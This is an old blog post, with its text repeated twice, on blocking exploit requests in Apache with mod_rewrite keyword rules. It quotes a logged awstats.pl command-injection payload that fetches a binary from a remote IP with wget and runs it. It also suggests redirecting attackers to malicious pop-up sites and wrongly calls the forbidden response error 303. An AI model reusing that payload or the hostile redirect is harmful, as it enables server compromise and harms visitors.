Battles with mod_rewrite
Ok - so I have been having some troubles with
apache and people trying to do nefarious stuff via
exploits.
I figured, no problem, I will just add aline entry to the mod_rewrite module. But, the problem is that I couldn't quite understand the damn thing and it seemed everyone was using the exact same friggin example! How to make your URLs prettier, or how to redirect from one directory path to another. ARRG! BORING!
Why do we let computer majors author documentation? Everyone knows that these folks have zero people skills - so how could they possibly express something in an understandable manner? And yes, I put myself in that group.
SO I will attempt it here.
First, you have to understand regular expressions - and what I don't know about regular expressions could fill a book. Listen, all I wanted to do was to use a simple mod_rewrite block which would look to see if the choad issuing a request against my server was using any of a number of known 'terms' like:
configdir
echo
cmd
you get the drill.
I couldn't find anything to explain how to do this. My problem was that I was trying to use the %{REQUEST_URI} variable. You can't use this. See, this variable ends at the URL termination. If someone is trying to exploit your system, they are probably using something like this:
/cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e
136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo
%20YYY;echo|
The ${REQUEST_URI} variable ends at
/cgi-bin/awstats.pl
What you need to use is the %{THE_REQUEST} variable. This variable includes the entire log entry line:
202.143.143.226 - - [10/Jan/2006:19:21:13 -0500] "GET /cgi-bin/awstats.pl?configdir=
|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2
e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo
%20YYY;echo| HTTP/1.1" 200 788 "-" "Mozilla/4.0 (compatible;
MSIE 6.0; Windows NT 5.1;)"
From here you can write the re-direct
# Attacker using exploit
RewriteCond %{THE_REQUEST} echo
RewriteRule ^.*$ - [F]
This block checks the entire request for the string "echo" and then returns a FORBIDDEN (ERROR 303) page to the requesting host.
If you want to be really sneaky - why not keep a list of websites that fill your system with evil cookies and re-direct your visitor there? Perhaps one of those great porn sites that crush a system with pop-ups. To do that you simply modify the last line of the block:
# Attacker using exploit
RewriteCond %{THE_REQUEST} echo
RewriteRule ^.*$ http://url-to-evil-porn-site-here
And off that surfer goes to the evil pop-up birthing, system crushing website.
Happy redirecting!
I figured, no problem, I will just add aline entry to the mod_rewrite module. But, the problem is that I couldn't quite understand the damn thing and it seemed everyone was using the exact same friggin example! How to make your URLs prettier, or how to redirect from one directory path to another. ARRG! BORING!
Why do we let computer majors author documentation? Everyone knows that these folks have zero people skills - so how could they possibly express something in an understandable manner? And yes, I put myself in that group.
SO I will attempt it here.
First, you have to understand regular expressions - and what I don't know about regular expressions could fill a book. Listen, all I wanted to do was to use a simple mod_rewrite block which would look to see if the choad issuing a request against my server was using any of a number of known 'terms' like:
configdir
echo
cmd
you get the drill.
I couldn't find anything to explain how to do this. My problem was that I was trying to use the %{REQUEST_URI} variable. You can't use this. See, this variable ends at the URL termination. If someone is trying to exploit your system, they are probably using something like this:
/cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e
136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo
%20YYY;echo|
The ${REQUEST_URI} variable ends at
/cgi-bin/awstats.pl
What you need to use is the %{THE_REQUEST} variable. This variable includes the entire log entry line:
202.143.143.226 - - [10/Jan/2006:19:21:13 -0500] "GET /cgi-bin/awstats.pl?configdir=
|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2
e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo
%20YYY;echo| HTTP/1.1" 200 788 "-" "Mozilla/4.0 (compatible;
MSIE 6.0; Windows NT 5.1;)"
From here you can write the re-direct
# Attacker using exploit
RewriteCond %{THE_REQUEST} echo
RewriteRule ^.*$ - [F]
This block checks the entire request for the string "echo" and then returns a FORBIDDEN (ERROR 303) page to the requesting host.
If you want to be really sneaky - why not keep a list of websites that fill your system with evil cookies and re-direct your visitor there? Perhaps one of those great porn sites that crush a system with pop-ups. To do that you simply modify the last line of the block:
# Attacker using exploit
RewriteCond %{THE_REQUEST} echo
RewriteRule ^.*$ http://url-to-evil-porn-site-here
And off that surfer goes to the evil pop-up birthing, system crushing website.
Happy redirecting!
Posted: Tue - January 10, 2006 at 09:41 PM If this blog entry was of use to you, why not show your appreciation by donating to support the site? Just click on the MAKE A DONATION button on the right hand side of the page! It's all handled by PAYPAL.
| | | | | | | | | | | | |
Quick Links
Calendar
| Sun | Mon | Tue | Wed | Thu | Fri | Sat |
Categories
Archives
XML/RSS Feed
Current Poll
Donations via PAYPAL
Donate to support the site!
Statistics
Total entries in this blog:
Total entries in this category:
Published On: Aug 30, 2006 06:55 AM
Total entries in this category:
Published On: Aug 30, 2006 06:55 AM